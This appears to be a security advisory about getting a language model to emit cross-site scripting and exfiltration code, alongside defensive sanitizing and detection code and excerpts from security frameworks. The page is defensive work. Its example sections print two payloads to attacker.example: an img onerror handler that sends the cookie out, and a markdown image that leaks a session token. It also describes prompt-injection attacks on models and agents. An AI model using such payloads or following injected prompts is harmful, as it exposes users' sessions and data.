XSS Attack Vulnerability

Updated: May 5, 2026

Description

Severity: High

The model can be made to include exfiltration code in its output, potentially leading to Cross-Site Scripting (XSS) attacks.

This vulnerability arises when the model generates output that includes malicious scripts or code, which could then be executed in the context of a user's browser. Attackers may exploit this flaw by crafting prompts that cause the model to output harmful code, which could be used for data exfiltration, website defacement, or the spreading of malware.
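The flaw described above can be sketched as a minimal, hypothetical rendering path. The function and payload below are illustrative assumptions, not taken from any specific application: model output is interpolated into HTML verbatim, so any markup the model is induced to emit will run in the user's browser.

```python
# Hypothetical vulnerable pattern: untrusted model output is interpolated
# into an HTML page with no escaping or sanitization.
def render_reply(model_output: str) -> str:
    # UNSAFE: model output is treated as trusted markup
    return f"<div class='chat-reply'>{model_output}</div>"

# An attacker-influenced completion carries straight through to the page.
# attacker.example is a placeholder domain for illustration.
payload = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
page = render_reply(payload)
# When the page is rendered, the onerror handler would execute in the
# user's browser and send document.cookie to the attacker's server.
```

The fix is context-aware output encoding before interpolation, as discussed under Remediation.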

Example Attack

If exploited, this vulnerability can lead to serious security breaches, including unauthorized access to sensitive data, session hijacking, and the injection of malicious scripts into trusted environments. Manipulated model output may steal credentials, redirect users to malicious sites, or execute harmful scripts. Such attacks undermine user trust, compromise website security, and expose organizations to significant reputational and financial risk.
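One concrete, hypothetical example of exfiltration that needs no script execution at all: many chat interfaces render model output as markdown and auto-fetch image URLs, so a prompt-injected model can encode data it has access to into an image URL it "helpfully" emits. The domain and token below are placeholders for illustration.

```python
# Hypothetical markdown-image exfiltration payload emitted by the model.
# "secret" stands in for any data visible in the model's context window.
secret = "sess_token_abc123"
exfil_markdown = f"![loading](https://attacker.example/log?d={secret})"
# When a client renders this markdown, the browser requests the attacker
# URL, delivering the secret in the query string without any JavaScript.
```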

Remediation

Investigate and improve the effectiveness of guardrails and other output security mechanisms to prevent the model from generating code that could be executed maliciously. Strengthen the model's ability to filter and sanitize output, especially when responding to prompts that could trigger the inclusion of executable or exfiltrative code. Implement rigorous security validation on all generated content to ensure that it is free from harmful scripts or code.
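A minimal sketch of one such output guardrail, assuming an HTML display context: strip obvious markdown exfiltration vectors, then HTML-escape the remainder. The patterns here are illustrative only; a production defense should use context-aware encoding libraries and an allowlist-based sanitizer rather than these ad hoc rules.

```python
import html
import re

def sanitize_model_output(text: str) -> str:
    """Escape model output for safe HTML display (one possible guardrail)."""
    # Remove markdown images pointing at external URLs, a common
    # zero-click exfiltration channel. Illustrative, not exhaustive.
    text = re.sub(r"!\[[^\]]*\]\(https?://[^)]+\)", "[image removed]", text)
    # Escape remaining markup so the browser renders it as text.
    return html.escape(text)

safe = sanitize_model_output('<script>steal()</script> ![x](https://evil.example/?c=1)')
```

After sanitization, the script tag is rendered as inert text and the external image reference is gone.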

Security Frameworks

A Prompt Injection Vulnerability occurs when user prompts alter the LLM's behavior or output in unintended ways. These inputs can affect the model even if they are imperceptible to humans; prompt injections therefore do not need to be human-visible or human-readable, as long as the content is parsed by the model.

Sensitive information can affect both the LLM and its application context. This includes personally identifiable information (PII), financial details, health records, confidential business data, security credentials, and legal documents. Proprietary models may also have unique training methods and source code considered sensitive, especially in closed or foundation models.

Improper Output Handling refers specifically to insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to providing users indirect access to additional functionality.
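The principle above can be illustrated with a hypothetical validation layer: LLM output destined for a downstream component is treated like untrusted user input and checked against an explicit contract before use. The action names, field names, and limits below are assumptions for the sketch, not part of any real API.

```python
import json

# Illustrative allowlist of actions the application is willing to execute.
ALLOWED_ACTIONS = {"search", "summarize"}

def parse_tool_call(model_output: str) -> dict:
    """Validate model-generated JSON before it reaches downstream systems."""
    call = json.loads(model_output)  # fail closed on malformed output
    if call.get("action") not in ALLOWED_ACTIONS:
        raise ValueError(f"disallowed action: {call.get('action')!r}")
    if not isinstance(call.get("query"), str) or len(call["query"]) > 500:
        raise ValueError("query must be a short string")
    # Return only the validated fields; ignore anything else the model added.
    return {"action": call["action"], "query": call["query"]}
```

Because only allowlisted, type-checked fields pass through, prompt-injected output cannot smuggle arbitrary instructions to downstream components via this path.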

Adversaries can Craft Adversarial Data that prevent a machine learning model from correctly identifying the contents of the data. This technique can be used to evade a downstream task where machine learning is utilized. The adversary may evade machine learning based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

Adversaries may use their access to an LLM that is part of a larger system to compromise connected plugins. LLMs are often connected to other services or resources via plugins to increase their capabilities. Plugins may include integrations with other applications, access to public or private data sources, and the ability to execute code.

Adversaries may craft prompts that induce the LLM to leak sensitive information. This can include private user data or proprietary information. The leaked information may come from proprietary training data, data sources the LLM is connected to, or information from other users of the LLM.
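One lightweight detection for this leakage pattern is an egress check on model output: flag any URL whose query string could smuggle data to a host outside a trusted allowlist. The allowlist, hostnames, and regex below are assumptions for the sketch; real deployments would pair this with proper URL parsing and broader policy.

```python
import re

# Assumed allowlist of hosts the application trusts in rendered output.
TRUSTED_HOSTS = {"docs.example.com"}

# Matches URLs that carry a query string, capturing the host portion.
URL_RE = re.compile(r"https?://([^/\s?]+)[^\s]*\?[^\s]+")

def flags_exfiltration(output: str) -> bool:
    """Return True if output contains a query-bearing URL to an untrusted host."""
    return any(host not in TRUSTED_HOSTS for host in URL_RE.findall(output))
```

Output that trips the check can be blocked or routed for review before it ever reaches a renderer that would auto-fetch the URL.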

The AI system is evaluated regularly for safety risks - as identified in the MAP function. The AI system to be deployed is demonstrated to be safe, its residual negative risk does not exceed the risk tolerance, and it can fail safely, particularly if made to operate beyond its knowledge limits. Safety metrics reflect system reliability and robustness, real-time monitoring, and response times for AI system failures.

AI system security and resilience - as identified in the MAP function - are evaluated and documented.

Post-deployment AI system monitoring plans are implemented, including mechanisms for capturing and evaluating input from users and other relevant AI actors, appeal and override, decommissioning, incident response, recovery, and change management.

The organization shall define and document verification and validation measures for the AI system and specify criteria for their use.

The organization shall define and document the necessary elements for the ongoing operation of the AI system. At a minimum, this should include system and performance monitoring, repairs, updates, and support.

The organization shall assess and document the potential impacts of AI systems on individuals or groups of individuals throughout the system's life cycle.

The organization shall determine and document a plan for communicating incidents to users of the AI system.

Attackers exploit code-generation features or embedded tool access to escalate actions into remote code execution (RCE), local misuse, or exploitation of internal systems.

Agents can misuse legitimate tools due to prompt injection, misalignment, or unsafe delegation, leading to data exfiltration, tool output manipulation, or workflow hijacking.